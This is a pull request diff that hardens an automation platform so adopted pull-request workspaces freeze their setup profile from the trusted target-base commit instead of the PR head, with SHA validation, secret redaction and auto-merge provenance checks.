### PR TITLE
fix: bootstrap adopted PR profiles from trusted base

### DIFF
--- a/docs/AWF_CORE_TRUST_MODEL.md
+++ b/docs/AWF_CORE_TRUST_MODEL.md
@@ -90,6 +90,14 @@ approved registries, and keep egress restricted.
 
 ## What AWF Core Enforces Locally
 
+Adopted PR monitor workspaces (`sync_feature_pr`) treat automatic profile
+resolution as a trust boundary: with `profile_ref=auto` and no operator inline
+profile, AWF freezes the workspace profile from the immutable adopted
+target-base revision rather than from the PR head. The PR author therefore
+cannot supply executable setup/monitor profile content at bootstrap through the
+head tree.
+
+
 - Workspace lifecycle state and terminal-state guards.
 - Isolated worktrees and profile-declared runtime/services.
 - Validation commands, health checks, freshness, and provenance.

--- a/docs/AWF_CORE_TRUST_MODEL.md
+++ b/docs/AWF_CORE_TRUST_MODEL.md
@@ -95,8 +95,9 @@ resolution as a trust boundary: with `profile_ref=auto` and no operator inline
 profile, AWF freezes the workspace profile from the immutable adopted
 target-base revision rather than from the PR head. The PR author therefore
 cannot supply executable setup/monitor profile content at bootstrap through the
-head tree.
-
+head tree. Repo-sourced `monitor.auto_merge` on an adopted workspace authorizes
+auto-merge only when that freeze recorded verified trusted-base provenance;
+legacy frozen head profiles still require an explicit operator intent.
 
 - Workspace lifecycle state and terminal-state guards.
 - Isolated worktrees and profile-declared runtime/services.

--- a/docs/PR_MONITOR_ADOPTION.md
+++ b/docs/PR_MONITOR_ADOPTION.md
@@ -183,14 +183,17 @@ Policy changes on an existing live adoption return
 
 For adopted `sync_feature_pr` workspaces with `profile_ref=auto` (or unset) and
 no operator-supplied inline profile, AWF resolves and freezes `resolved_profile`
-from the **immutable adopted target-base revision** (`base_commit` /
-`pr_adoption.base_sha`). The durable workspace worktree remains the PR head so
+from the **immutable adopted target-base revision** (`pr_adoption.base_sha`,
+falling back to a full `base_commit` only when adoption `base_sha` is absent).
+The durable workspace worktree remains the PR head so
 monitor repairs can fast-forward push that branch, but PR-head
 `.awf/workspace.yml` content is never used as the bootstrap profile for that
 path. Explicit inline profiles and non-`auto` registry `profile_ref` values keep
-their existing precedence. If the trusted base snapshot cannot be materialized
-or resolved, provisioning fails closed (no silent fallback to the PR head).
-
+their existing precedence. If the trusted base snapshot cannot be materialized,
+resolved, or reclaimed, provisioning fails closed (no silent fallback to the PR
+head). A `repo:` `monitor.auto_merge` default from an adopted profile authorizes
+auto-merge only when trusted-base provenance was stamped and verified; legacy
+frozen PR-head profiles still require an explicit operator auto-merge intent.
 
 For idempotent retries, omitted/null and explicit `900` are different adoption
 policies. If the first request omitted the grace override, later REST or MCP

--- a/docs/PR_MONITOR_ADOPTION.md
+++ b/docs/PR_MONITOR_ADOPTION.md
@@ -179,6 +179,19 @@ Policy changes on an existing live adoption return
 `model`, `effort`, `cursor_auto_mode`, `profile_ref`, inline profile, `auto_merge`,
 `initial_review_grace_period_seconds`, `external_id`, or `task_class`.
 
+### Automatic profile resolution trust boundary
+
+For adopted `sync_feature_pr` workspaces with `profile_ref=auto` (or unset) and
+no operator-supplied inline profile, AWF resolves and freezes `resolved_profile`
+from the **immutable adopted target-base revision** (`base_commit` /
+`pr_adoption.base_sha`). The durable workspace worktree remains the PR head so
+monitor repairs can fast-forward push that branch, but PR-head
+`.awf/workspace.yml` content is never used as the bootstrap profile for that
+path. Explicit inline profiles and non-`auto` registry `profile_ref` values keep
+their existing precedence. If the trusted base snapshot cannot be materialized
+or resolved, provisioning fails closed (no silent fallback to the PR head).
+
+
 For idempotent retries, omitted/null and explicit `900` are different adoption
 policies. If the first request omitted the grace override, later REST or MCP
 retries must also omit it or send `null`; if the first request set `900`,

--- a/src/awf/node/git_manager.py
+++ b/src/awf/node/git_manager.py
@@ -735,6 +735,115 @@ class GitManager:
             branch_name=new_branch,
         )
 
+    async def add_detached_worktree_at_commit(
+        self, *, workspace_id: str, repo_url: str, commit_sha: str
+    ) -> WorktreeLayout:
+        """Materialize a detached read-only worktree at an immutable commit SHA.
+
+        Used for trusted-base profile resolution during adopted ``sync_feature_pr``
+        provisioning: the durable workspace worktree remains the PR head, while
+        this ephemeral snapshot exposes the adopted target-base tree. The caller
+        must always reclaim via ``remove_worktree`` (success and failure).
+
+        Raises ``GitOperationError`` with:
+        - ``GIT_WORKTREE_ALREADY_EXISTS`` when the path is already present
+        - ``GIT_BASE_BRANCH_MISSING`` when the commit cannot be resolved in the mirror
+        """
+        cleaned_sha = (commit_sha or "").strip()
+        if not cleaned_sha:
+            raise GitOperationError(
+                operation="worktree.add_detached",
+                returncode=1,
+                stdout="",
+                stderr="commit SHA is required for detached worktree materialization",
+                reason_code="GIT_BASE_BRANCH_MISSING",
+            )
+
+        worktree_path = self._worktree_path_for(workspace_id)
+        mirror_path = await self.ensure_mirror(repo_url)
+        self._worktrees_dir.mkdir(parents=True, exist_ok=True)
+
+        if worktree_path.exists():
+            raise GitOperationError(
+                operation="worktree.add_detached",
+                returncode=1,
+                stdout="",
+                stderr=f"worktree path already exists: {worktree_path}",
+                reason_code="GIT_WORKTREE_ALREADY_EXISTS",
+            )
+
+        lock = self._lock_for_mirror(mirror_path)
+        async with lock:
+            try:
+                await self._run(
+                    [
+                        "git",
+                        "--git-dir",
+                        str(mirror_path),
+                        "rev-parse",
+                        "--verify",
+                        f"{cleaned_sha}^{{commit}}",
+                    ],
+                    operation="mirror.rev-parse_commit",
+                )
+            except GitOperationError:
+                # Commit may exist only on a recently updated remote tip that
+                # ``ensure_mirror`` has not yet advertised as a peelable object
+                # under some shallow/partial mirrors — try a targeted fetch.
+                try:
+                    await self._run(
+                        [
+                            "git",
+                            "--git-dir",
+                            str(mirror_path),
+                            "fetch",
+                            "--no-tags",
+                            "origin",
+                            cleaned_sha,
+                        ],
+                        operation="mirror.fetch_commit",
+                    )
+                    await self._run(
+                        [
+                            "git",
+                            "--git-dir",
+                            str(mirror_path),
+                            "rev-parse",
+                            "--verify",
+                            f"{cleaned_sha}^{{commit}}",
+                        ],
+                        operation="mirror.rev-parse_commit",
+                    )
+                except GitOperationError as exc:
+                    raise GitOperationError(
+                        operation="worktree.add_detached",
+                        returncode=exc.returncode,
+                        stdout=exc.stdout,
+                        stderr=exc.stderr,
+                        reason_code="GIT_BASE_BRANCH_MISSING",
+                    ) from exc
+
+            await self._run(
+                [
+                    "git",
+                    "--git-dir",
+                    str(mirror_path),
+                    "worktree",
+                    "add",
+                    "--detach",
+                    str(worktree_path),
+                    cleaned_sha,
+                ],
+                operation="worktree.add_detached",
+            )
+
+        # Ephemeral profile snapshot — no agent runtime will write here.
+        return WorktreeLayout(
+            mirror_path=mirror_path,
+            worktree_path=worktree_path,
+            branch_name="",
+        )
+
     async def remove_worktree(self, *, workspace_id: str, repo_url: str) -> None:
         """Remove a worktree idempotently. Missing worktrees are not errors.
 

--- a/src/awf/node/git_manager.py
+++ b/src/awf/node/git_manager.py
@@ -750,12 +750,17 @@ class GitManager:
         - ``GIT_BASE_BRANCH_MISSING`` when the commit cannot be resolved in the mirror
         """
         cleaned_sha = (commit_sha or "").strip()
-        if not cleaned_sha:
+        if not (
+            len(cleaned_sha) == 40 and all(char in "0123456789abcdefABCDEF" for char in cleaned_sha)
+        ):
             raise GitOperationError(
                 operation="worktree.add_detached",
                 returncode=1,
                 stdout="",
-                stderr="commit SHA is required for detached worktree materialization",
+                stderr=(
+                    "exact immutable full commit SHA (40 hex) is required for "
+                    "detached worktree materialization"
+                ),
                 reason_code="GIT_BASE_BRANCH_MISSING",
             )
 

--- a/src/awf/node/git_manager.py
+++ b/src/awf/node/git_manager.py
@@ -34,7 +34,9 @@ from awf.common.commands import _terminate_process
 from awf.common.git_auth import GitAuthNotConfiguredError, verify_bitbucket_git_auth
 from awf.common.git_identity import git_safe_directory_config_args
 from awf.common.logging import get_logger
+from awf.node import git_manager_detached as _git_manager_detached
 from awf.node import git_manager_ownership as _git_manager_ownership
+from awf.node.git_manager_head_object import verify_head_object_exists as verify_head_object_exists
 
 _log = get_logger(__name__)
 
@@ -738,115 +740,12 @@ class GitManager:
     async def add_detached_worktree_at_commit(
         self, *, workspace_id: str, repo_url: str, commit_sha: str
     ) -> WorktreeLayout:
-        """Materialize a detached read-only worktree at an immutable commit SHA.
-
-        Used for trusted-base profile resolution during adopted ``sync_feature_pr``
-        provisioning: the durable workspace worktree remains the PR head, while
-        this ephemeral snapshot exposes the adopted target-base tree. The caller
-        must always reclaim via ``remove_worktree`` (success and failure).
-
-        Raises ``GitOperationError`` with:
-        - ``GIT_WORKTREE_ALREADY_EXISTS`` when the path is already present
-        - ``GIT_BASE_BRANCH_MISSING`` when the commit cannot be resolved in the mirror
-        """
-        cleaned_sha = (commit_sha or "").strip()
-        if not (
-            len(cleaned_sha) == 40 and all(char in "0123456789abcdefABCDEF" for char in cleaned_sha)
-        ):
-            raise GitOperationError(
-                operation="worktree.add_detached",
-                returncode=1,
-                stdout="",
-                stderr=(
-                    "exact immutable full commit SHA (40 hex) is required for "
-                    "detached worktree materialization"
-                ),
-                reason_code="GIT_BASE_BRANCH_MISSING",
-            )
-
-        worktree_path = self._worktree_path_for(workspace_id)
-        mirror_path = await self.ensure_mirror(repo_url)
-        self._worktrees_dir.mkdir(parents=True, exist_ok=True)
-
-        if worktree_path.exists():
-            raise GitOperationError(
-                operation="worktree.add_detached",
-                returncode=1,
-                stdout="",
-                stderr=f"worktree path already exists: {worktree_path}",
-                reason_code="GIT_WORKTREE_ALREADY_EXISTS",
-            )
-
-        lock = self._lock_for_mirror(mirror_path)
-        async with lock:
-            try:
-                await self._run(
-                    [
-                        "git",
-                        "--git-dir",
-                        str(mirror_path),
-                        "rev-parse",
-                        "--verify",
-                        f"{cleaned_sha}^{{commit}}",
-                    ],
-                    operation="mirror.rev-parse_commit",
-                )
-            except GitOperationError:
-                # Commit may exist only on a recently updated remote tip that
-                # ``ensure_mirror`` has not yet advertised as a peelable object
-                # under some shallow/partial mirrors — try a targeted fetch.
-                try:
-                    await self._run(
-                        [
-                            "git",
-                            "--git-dir",
-                            str(mirror_path),
-                            "fetch",
-                            "--no-tags",
-                            "origin",
-                            cleaned_sha,
-                        ],
-                        operation="mirror.fetch_commit",
-                    )
-                    await self._run(
-                        [
-                            "git",
-                            "--git-dir",
-                            str(mirror_path),
-                            "rev-parse",
-                            "--verify",
-                            f"{cleaned_sha}^{{commit}}",
-                        ],
-                        operation="mirror.rev-parse_commit",
-                    )
-                except GitOperationError as exc:
-                    raise GitOperationError(
-                        operation="worktree.add_detached",
-                        returncode=exc.returncode,
-                        stdout=exc.stdout,
-                        stderr=exc.stderr,
-                        reason_code="GIT_BASE_BRANCH_MISSING",
-                    ) from exc
-
-            await self._run(
-                [
-                    "git",
-                    "--git-dir",
-                    str(mirror_path),
-                    "worktree",
-                    "add",
-                    "--detach",
-                    str(worktree_path),
-                    cleaned_sha,
-                ],
-                operation="worktree.add_detached",
-            )
-
-        # Ephemeral profile snapshot — no agent runtime will write here.
-        return WorktreeLayout(
-            mirror_path=mirror_path,
-            worktree_path=worktree_path,
-            branch_name="",
+        """Materialize a detached read-only worktree at an immutable commit SHA."""
+        return await _git_manager_detached.add_detached_worktree_at_commit(
+            self,
+            workspace_id=workspace_id,
+            repo_url=repo_url,
+            commit_sha=commit_sha,
         )
 
     async def remove_worktree(self, *, workspace_id: str, repo_url: str) -> None:
@@ -1549,61 +1448,3 @@ async def repair_mirror_hooks_path(mirror_path: Path) -> bool:
                 reason_code="MIRROR_HOOKS_PATH_REPAIR_FAILED",
             )
         return repaired or retry_repaired
-
-
-async def verify_head_object_exists(worktree_path: Path) -> bool:
-    """Return ``True`` when HEAD's commit object is reachable in the object database.
-
-    Uses ``git cat-file -e HEAD^{commit}`` which exits 0 when the object exists
-    and non-zero when the ref exists but the commit object is missing. Repository
-    alternates are cleared before probing because they can make a shared mirror
-    appear to contain objects that only exist in a workspace-private store.
-    """
-    if not _clear_repository_object_alternates(worktree_path):
-        return False
-
-    proc = await asyncio.create_subprocess_exec(
-        "git",
-        *git_safe_directory_config_args(worktree_path),
-        "-C",
-        str(worktree_path),
-        "cat-file",
-        "-e",
-        "HEAD^{commit}",
-        stdout=asyncio.subprocess.PIPE,
-        stderr=asyncio.subprocess.PIPE,
-        env=git_env_without_object_lookup_overrides(),
-    )
-    await proc.communicate()
-    assert proc.returncode is not None
-    return proc.returncode == 0
-
-
-def _clear_repository_object_alternates(worktree_path: Path) -> bool:
-    alternates_path = _repository_alternates_path_for_worktree(worktree_path)
-    if alternates_path is None:
-        return True
-    try:
-        alternates_path.unlink()
-    except FileNotFoundError:
-        return True
-    except OSError as exc:
-        _log.warning(
-            "git.repository_alternates_clear_failed",
-            path=str(alternates_path),
-            error=str(exc),
-        )
-        return False
-    _log.warning("git.repository_alternates_cleared", path=str(alternates_path))
-    return True
-
-
-def _repository_alternates_path_for_worktree(worktree_path: Path) -> Path | None:
-    common_dir = mirror_path_for_worktree(worktree_path)
-    if common_dir is not None:
-        return common_dir / "objects" / "info" / "alternates"
-
-    git_dir = worktree_path / ".git"
-    if git_dir.is_dir():
-        return git_dir / "objects" / "info" / "alternates"
-    return None

--- a/src/awf/node/git_manager_detached.py
+++ b/src/awf/node/git_manager_detached.py
@@ -1,0 +1,130 @@
+"""Detached worktree materialization for trusted-base profile snapshots."""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from awf.node.git_manager import GitManager, WorktreeLayout
+
+
+async def add_detached_worktree_at_commit(
+    manager: GitManager,
+    *,
+    workspace_id: str,
+    repo_url: str,
+    commit_sha: str,
+) -> WorktreeLayout:
+    """Materialize a detached read-only worktree at an immutable commit SHA.
+
+    Used for trusted-base profile resolution during adopted ``sync_feature_pr``
+    provisioning: the durable workspace worktree remains the PR head, while
+    this ephemeral snapshot exposes the adopted target-base tree. The caller
+    must always reclaim via ``remove_worktree`` (success and failure).
+
+    Raises ``GitOperationError`` with:
+    - ``GIT_WORKTREE_ALREADY_EXISTS`` when the path is already present
+    - ``GIT_BASE_BRANCH_MISSING`` when the commit cannot be resolved in the mirror
+    """
+    # Late import: ``git_manager`` loads this module while defining ``GitManager``.
+    from awf.node.git_manager import GitOperationError, WorktreeLayout
+
+    cleaned_sha = (commit_sha or "").strip()
+    if not (
+        len(cleaned_sha) == 40 and all(char in "0123456789abcdefABCDEF" for char in cleaned_sha)
+    ):
+        raise GitOperationError(
+            operation="worktree.add_detached",
+            returncode=1,
+            stdout="",
+            stderr=(
+                "exact immutable full commit SHA (40 hex) is required for "
+                "detached worktree materialization"
+            ),
+            reason_code="GIT_BASE_BRANCH_MISSING",
+        )
+
+    worktree_path = manager._worktree_path_for(workspace_id)
+    mirror_path = await manager.ensure_mirror(repo_url)
+    manager._worktrees_dir.mkdir(parents=True, exist_ok=True)
+
+    if worktree_path.exists():
+        raise GitOperationError(
+            operation="worktree.add_detached",
+            returncode=1,
+            stdout="",
+            stderr=f"worktree path already exists: {worktree_path}",
+            reason_code="GIT_WORKTREE_ALREADY_EXISTS",
+        )
+
+    lock = manager._lock_for_mirror(mirror_path)
+    async with lock:
+        try:
+            await manager._run(
+                [
+                    "git",
+                    "--git-dir",
+                    str(mirror_path),
+                    "rev-parse",
+                    "--verify",
+                    f"{cleaned_sha}^{{commit}}",
+                ],
+                operation="mirror.rev-parse_commit",
+            )
+        except GitOperationError:
+            # Commit may exist only on a recently updated remote tip that
+            # ``ensure_mirror`` has not yet advertised as a peelable object
+            # under some shallow/partial mirrors — try a targeted fetch.
+            try:
+                await manager._run(
+                    [
+                        "git",
+                        "--git-dir",
+                        str(mirror_path),
+                        "fetch",
+                        "--no-tags",
+                        "origin",
+                        cleaned_sha,
+                    ],
+                    operation="mirror.fetch_commit",
+                )
+                await manager._run(
+                    [
+                        "git",
+                        "--git-dir",
+                        str(mirror_path),
+                        "rev-parse",
+                        "--verify",
+                        f"{cleaned_sha}^{{commit}}",
+                    ],
+                    operation="mirror.rev-parse_commit",
+                )
+            except GitOperationError as exc:
+                raise GitOperationError(
+                    operation="worktree.add_detached",
+                    returncode=exc.returncode,
+                    stdout=exc.stdout,
+                    stderr=exc.stderr,
+                    reason_code="GIT_BASE_BRANCH_MISSING",
+                ) from exc
+
+        await manager._run(
+            [
+                "git",
+                "--git-dir",
+                str(mirror_path),
+                "worktree",
+                "add",
+                "--detach",
+                str(worktree_path),
+                cleaned_sha,
+            ],
+            operation="worktree.add_detached",
+        )
+
+    # Ephemeral profile snapshot — no agent runtime will write here.
+    return WorktreeLayout(
+        mirror_path=mirror_path,
+        worktree_path=worktree_path,
+        branch_name="",
+    )

--- a/src/awf/node/git_manager_head_object.py
+++ b/src/awf/node/git_manager_head_object.py
@@ -1,0 +1,73 @@
+"""HEAD object reachability probes for linked worktrees."""
+
+from __future__ import annotations
+
+import asyncio
+from pathlib import Path
+
+from awf.common.git_identity import git_safe_directory_config_args
+from awf.common.logging import get_logger
+from awf.node.git_manager_ownership import git_env_without_object_lookup_overrides
+
+_log = get_logger(__name__)
+
+
+async def verify_head_object_exists(worktree_path: Path) -> bool:
+    """Return ``True`` when HEAD's commit object is reachable in the object database.
+
+    Uses ``git cat-file -e HEAD^{commit}`` which exits 0 when the object exists
+    and non-zero when the ref exists but the commit object is missing. Repository
+    alternates are cleared before probing because they can make a shared mirror
+    appear to contain objects that only exist in a workspace-private store.
+    """
+    if not _clear_repository_object_alternates(worktree_path):
+        return False
+
+    proc = await asyncio.create_subprocess_exec(
+        "git",
+        *git_safe_directory_config_args(worktree_path),
+        "-C",
+        str(worktree_path),
+        "cat-file",
+        "-e",
+        "HEAD^{commit}",
+        stdout=asyncio.subprocess.PIPE,
+        stderr=asyncio.subprocess.PIPE,
+        env=git_env_without_object_lookup_overrides(),
+    )
+    await proc.communicate()
+    assert proc.returncode is not None
+    return proc.returncode == 0
+
+
+def _clear_repository_object_alternates(worktree_path: Path) -> bool:
+    alternates_path = _repository_alternates_path_for_worktree(worktree_path)
+    if alternates_path is None:
+        return True
+    try:
+        alternates_path.unlink()
+    except FileNotFoundError:
+        return True
+    except OSError as exc:
+        _log.warning(
+            "git.repository_alternates_clear_failed",
+            path=str(alternates_path),
+            error=str(exc),
+        )
+        return False
+    _log.warning("git.repository_alternates_cleared", path=str(alternates_path))
+    return True
+
+
+def _repository_alternates_path_for_worktree(worktree_path: Path) -> Path | None:
+    # Late import avoids a cycle: ``git_manager`` re-exports this module.
+    from awf.node.git_manager import mirror_path_for_worktree
+
+    common_dir = mirror_path_for_worktree(worktree_path)
+    if common_dir is not None:
+        return common_dir / "objects" / "info" / "alternates"
+
+    git_dir = worktree_path / ".git"
+    if git_dir.is_dir():
+        return git_dir / "objects" / "info" / "alternates"
+    return None

--- a/src/awf/node/provisioner.py
+++ b/src/awf/node/provisioner.py
@@ -88,6 +88,13 @@ _provision_local_branch_name = _provisioner_helpers._provision_local_branch_name
 _provision_profile_auto_merge_is_trusted = (
     _provisioner_helpers._provision_profile_auto_merge_is_trusted
 )
+_should_resolve_adopted_auto_profile_from_trusted_base = (
+    _provisioner_helpers._should_resolve_adopted_auto_profile_from_trusted_base
+)
+_trusted_base_profile_worktree_id = _provisioner_helpers._trusted_base_profile_worktree_id
+_trusted_base_sha_for_adopted_auto_profile = (
+    _provisioner_helpers._trusted_base_sha_for_adopted_auto_profile
+)
 _provision_remote_push_branch = _provisioner_helpers._provision_remote_push_branch
 _retain_ancestor_base_commit = _provisioner_helpers._retain_ancestor_base_commit
 _reconcile_active_reservation_for_profile = (
@@ -298,14 +305,53 @@ class Provisioner(
             if ws.resolved_profile is None or _resolved_profile_requires_credential_rehydration(
                 ws.resolved_profile
             ):
-                profile_resolution = resolve_workspace_profile(
-                    worktree_path=layout.worktree_path,
-                    inline_profile=ws.requested_profile,
-                    profile_ref=ws.profile_ref or ws.env_profile or "auto",
-                    validation_commands=list(ws.test_commands),
-                    repo_url=ws.repo_url,
-                )
-                profile = profile_resolution.profile
+                if _should_resolve_adopted_auto_profile_from_trusted_base(ws):
+                    trusted_base_sha = _trusted_base_sha_for_adopted_auto_profile(ws)
+                    if not trusted_base_sha:
+                        raise ProfileResolutionError(
+                            "adopted sync_feature_pr auto profile requires an immutable "
+                            "target-base SHA; refusing to resolve from the PR head",
+                            reason_code="PROFILE_TRUSTED_BASE_SHA_MISSING",
+                        )
+                    snapshot_id = _trusted_base_profile_worktree_id(workspace_id)
+                    snapshot_layout = None
+                    try:
+                        snapshot_layout = await self._git.add_detached_worktree_at_commit(
+                            workspace_id=snapshot_id,
+                            repo_url=ws.repo_url,
+                            commit_sha=trusted_base_sha,
+                        )
+                        profile_resolution = resolve_workspace_profile(
+                            worktree_path=snapshot_layout.worktree_path,
+                            inline_profile=None,
+                            profile_ref="auto",
+                            validation_commands=list(ws.test_commands),
+                            repo_url=ws.repo_url,
+                        )
+                    finally:
+                        try:
+                            await self._git.remove_worktree(
+                                workspace_id=snapshot_id,
+                                repo_url=ws.repo_url,
+                            )
+                        except GitOperationError as cleanup_exc:
+                            _log.warning(
+                                "provisioner.trusted_base_profile_snapshot_cleanup_failed",
+                                workspace_id=workspace_id,
+                                snapshot_id=snapshot_id,
+                                reason_code=cleanup_exc.reason_code,
+                                stderr=cleanup_exc.stderr[:500],
+                            )
+                    profile = profile_resolution.profile
+                else:
+                    profile_resolution = resolve_workspace_profile(
+                        worktree_path=layout.worktree_path,
+                        inline_profile=ws.requested_profile,
+                        profile_ref=ws.profile_ref or ws.env_profile or "auto",
+                        validation_commands=list(ws.test_commands),
+                        repo_url=ws.repo_url,
+                    )
+                    profile = profile_resolution.profile
             else:
                 profile = WorkspaceProfile.model_validate_persisted(ws.resolved_profile)
             resolved_profile_dict = (
@@ -623,12 +669,12 @@ class Provisioner(
                 "provisioner.git_failed",
                 workspace_id=workspace_id,
                 reason_code=exc.reason_code,
-                stderr=exc.stderr[:2000],
+                stderr=redact_secrets(exc.stderr[:2000]),
             )
             await self._mark_failed(
                 workspace_id=workspace_id,
                 failure_reason=FailureReason.infrastructure_failure,
-                message=str(exc)[:2000],
+                message=redact_secrets(str(exc))[:2000],
                 from_status=WorkspaceStatus.provisioning,
                 execution_claim_epoch=execution_claim_epoch,
             )
@@ -923,13 +969,12 @@ class Provisioner(
             # profile's new default, so only re-resolve when the intent key is
             # actually present and otherwise preserve the persisted column.
             #
-            # Trust boundary: an adopted feature PR resolves its profile from the PR
-            # head checkout, so its ``monitor.auto_merge`` config is attacker-
-            # controlled. It must not authorize auto-merge — only an explicit
-            # operator intent may. When the profile is untrusted and the intent is
-            # unset we short-circuit to ``DEFAULT_AUTO_MERGE`` instead of falling
-            # through to the profile config (AWF owns merge safety; a PR cannot
-            # enable its own merge).
+            # Trust boundary: adopted ``sync_feature_pr`` auto profiles freeze from
+            # the immutable target base, so a ``repo:`` ``monitor.auto_merge``
+            # config is operator/base-controlled. When a profile is still marked
+            # untrusted and intent is unset, short-circuit to ``DEFAULT_AUTO_MERGE``
+            # instead of honouring that config (fail-closed for any residual
+            # head-sourced path).
             if task_policy_has_auto_merge_intent(persisted.task_policy):
                 auto_merge_intent = auto_merge_intent_from_policy(persisted.task_policy)
                 if auto_merge_intent is None and not _provision_profile_auto_merge_is_trusted(

--- a/src/awf/node/provisioner.py
+++ b/src/awf/node/provisioner.py
@@ -91,6 +91,7 @@ _provision_profile_auto_merge_is_trusted = (
 _should_resolve_adopted_auto_profile_from_trusted_base = (
     _provisioner_helpers._should_resolve_adopted_auto_profile_from_trusted_base
 )
+_stamp_trusted_base_profile_provenance = _provisioner_helpers._stamp_trusted_base_profile_provenance
 _trusted_base_profile_worktree_id = _provisioner_helpers._trusted_base_profile_worktree_id
 _trusted_base_sha_for_adopted_auto_profile = (
     _provisioner_helpers._trusted_base_sha_for_adopted_auto_profile
@@ -254,6 +255,7 @@ class Provisioner(
         egress_decision: EgressDecision | None = None
         destination_category: str | None = None
         stack_launch_started = False
+        trusted_base_profile_sha: str | None = None
         # Snapshot for pre-launch _mark_failed after deferred Cursor ready-path
         # preflight (which intentionally skips publishing resolved_profile).
         # Set only once checkout profile resolve succeeds; stays None when
@@ -310,11 +312,10 @@ class Provisioner(
                     if not trusted_base_sha:
                         raise ProfileResolutionError(
                             "adopted sync_feature_pr auto profile requires an immutable "
-                            "target-base SHA; refusing to resolve from the PR head",
+                            "full target-base commit SHA; refusing to resolve from the PR head",
                             reason_code="PROFILE_TRUSTED_BASE_SHA_MISSING",
                         )
                     snapshot_id = _trusted_base_profile_worktree_id(workspace_id)
-                    snapshot_layout = None
                     try:
                         snapshot_layout = await self._git.add_detached_worktree_at_commit(
                             workspace_id=snapshot_id,
@@ -328,6 +329,7 @@ class Provisioner(
                             validation_commands=list(ws.test_commands),
                             repo_url=ws.repo_url,
                         )
+                        trusted_base_profile_sha = trusted_base_sha
                     finally:
                         try:
                             await self._git.remove_worktree(
@@ -335,13 +337,23 @@ class Provisioner(
                                 repo_url=ws.repo_url,
                             )
                         except GitOperationError as cleanup_exc:
+                            redacted_stderr = redact_secrets(cleanup_exc.stderr[:2000])
+                            redacted_stdout = redact_secrets(cleanup_exc.stdout[:2000])
                             _log.warning(
                                 "provisioner.trusted_base_profile_snapshot_cleanup_failed",
                                 workspace_id=workspace_id,
                                 snapshot_id=snapshot_id,
-                                reason_code=cleanup_exc.reason_code,
-                                stderr=cleanup_exc.stderr[:500],
+                                reason_code="GIT_WORKTREE_REMOVE_FAILED",
+                                stderr=redacted_stderr,
+                                error=redact_secrets(str(cleanup_exc))[:2000],
                             )
+                            raise GitOperationError(
+                                operation="worktree.remove_trusted_base_snapshot",
+                                returncode=cleanup_exc.returncode,
+                                stdout=redacted_stdout,
+                                stderr=redacted_stderr,
+                                reason_code="GIT_WORKTREE_REMOVE_FAILED",
+                            ) from cleanup_exc
                     profile = profile_resolution.profile
                 else:
                     profile_resolution = resolve_workspace_profile(
@@ -969,12 +981,17 @@ class Provisioner(
             # profile's new default, so only re-resolve when the intent key is
             # actually present and otherwise preserve the persisted column.
             #
-            # Trust boundary: adopted ``sync_feature_pr`` auto profiles freeze from
-            # the immutable target base, so a ``repo:`` ``monitor.auto_merge``
-            # config is operator/base-controlled. When a profile is still marked
-            # untrusted and intent is unset, short-circuit to ``DEFAULT_AUTO_MERGE``
-            # instead of honouring that config (fail-closed for any residual
-            # head-sourced path).
+            # Trust boundary: adopted ``sync_feature_pr`` ``repo:`` profiles may
+            # still be legacy/frozen from an untrusted PR head. Honour
+            # ``monitor.auto_merge`` from those sources only when trusted-base
+            # provenance was explicitly stamped and verified for this adoption;
+            # otherwise short-circuit to ``DEFAULT_AUTO_MERGE`` when intent is
+            # unset (explicit operator intent still wins).
+            if trusted_base_profile_sha is not None:
+                persisted.task_policy = _stamp_trusted_base_profile_provenance(
+                    persisted.task_policy if isinstance(persisted.task_policy, dict) else None,
+                    trusted_base_sha=trusted_base_profile_sha,
+                )
             if task_policy_has_auto_merge_intent(persisted.task_policy):
                 auto_merge_intent = auto_merge_intent_from_policy(persisted.task_policy)
                 if auto_merge_intent is None and not _provision_profile_auto_merge_is_trusted(

--- a/src/awf/node/provisioner_helpers.py
+++ b/src/awf/node/provisioner_helpers.py
@@ -220,7 +220,10 @@ def _adopted_profile_trusted_base_provenance_verified(ws: Workspace) -> bool:
 
     Legacy/frozen ``resolved_profile`` rows may still originate from an untrusted
     PR head. A ``repo:`` auto-merge default is trusted only when provisioning
-    stamped an exact full SHA that matches the immutable adoption base.
+    stamped an exact full SHA that matches the immutable adoption base
+    (``pr_adoption.base_sha``). Never re-derive expected tip from
+    ``workspace.base_commit``: after a successful provision that field may hold a
+    retained merge-base for unrebased heads and would false-fail a valid stamp.
     """
     adoption = _sync_feature_pr_adoption(ws)
     if adoption is None:
@@ -228,22 +231,34 @@ def _adopted_profile_trusted_base_provenance_verified(ws: Workspace) -> bool:
     stamped = adoption.get(_PROFILE_TRUSTED_BASE_SHA_KEY)
     if not isinstance(stamped, str) or not _is_exact_full_commit_sha(stamped):
         return False
-    expected = _trusted_base_sha_for_adopted_auto_profile(ws)
-    if expected is None:
+    base_sha = adoption.get("base_sha")
+    if not isinstance(base_sha, str):
         return False
-    return stamped.lower() == expected.lower()
+    cleaned = base_sha.strip()
+    if not _is_exact_full_commit_sha(cleaned):
+        return False
+    return stamped.lower() == cleaned.lower()
 
 
 def _stamp_trusted_base_profile_provenance(
     task_policy: dict[str, Any] | None, *, trusted_base_sha: str
 ) -> dict[str, Any]:
-    """Return a copy of task_policy with verified trusted-base profile provenance."""
+    """Return a copy of task_policy with verified trusted-base profile provenance.
+
+    Also persists ``pr_adoption.base_sha`` when absent/invalid so later
+    ``workspace.base_commit`` retention (merge-base) cannot erase the tip used
+    for the profile freeze.
+    """
     if not _is_exact_full_commit_sha(trusted_base_sha):
         raise ValueError("trusted_base_sha must be an exact full commit SHA")
+    normalized = trusted_base_sha.lower()
     policy = dict(task_policy or {})
     adoption_raw = policy.get("pr_adoption")
     adoption = dict(adoption_raw) if isinstance(adoption_raw, dict) else {}
-    adoption[_PROFILE_TRUSTED_BASE_SHA_KEY] = trusted_base_sha.lower()
+    adoption[_PROFILE_TRUSTED_BASE_SHA_KEY] = normalized
+    existing_base = adoption.get("base_sha")
+    if not (isinstance(existing_base, str) and _is_exact_full_commit_sha(existing_base.strip())):
+        adoption["base_sha"] = normalized
     policy["pr_adoption"] = adoption
     return policy
 

--- a/src/awf/node/provisioner_helpers.py
+++ b/src/awf/node/provisioner_helpers.py
@@ -203,19 +203,72 @@ def _provision_remote_push_branch(ws: Workspace) -> str | None:
     return _sync_feature_pr_head_ref(ws) or _release_sync_source_branch(ws) or ws.remote_push_branch
 
 
+_PROFILE_TRUSTED_BASE_SHA_KEY = "profile_trusted_base_sha"
+
+
